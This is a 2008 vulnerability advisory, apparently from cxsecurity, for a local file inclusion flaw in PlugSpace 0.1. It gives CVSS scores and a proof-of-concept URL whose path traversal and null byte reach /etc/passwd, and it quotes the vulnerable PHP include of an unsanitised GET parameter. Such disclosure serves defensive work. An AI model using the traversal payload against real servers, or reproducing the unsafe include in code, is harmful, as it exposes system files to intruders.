PlugSpace 0.1 (index.php navi) Local File Inclusion Vulnerability

2008-10-24 / 2008-10-25
Credit: dun
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[ Discovered by dun \ dun[at]strcpy.pl ] ############################################################## # [ PlugSpace v0.1 ] Local File Inclusion Vulnerability # ############################################################## # # Download: http://sourceforge.net/projects/plugspace/ # # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00 # # # Bug: ./plugspace/index.php (lines: 64-81) # # ... # 64: if (!isset($_GET['navi'])) # 65: { # ... # 77: } # 78: else # 79: { # 80: include("plugins/".$_GET['navi']."/main.php"); // LFI # 81: } # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] *******************************************************************************************

References:

http://www.securityfocus.com/bid/31457


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top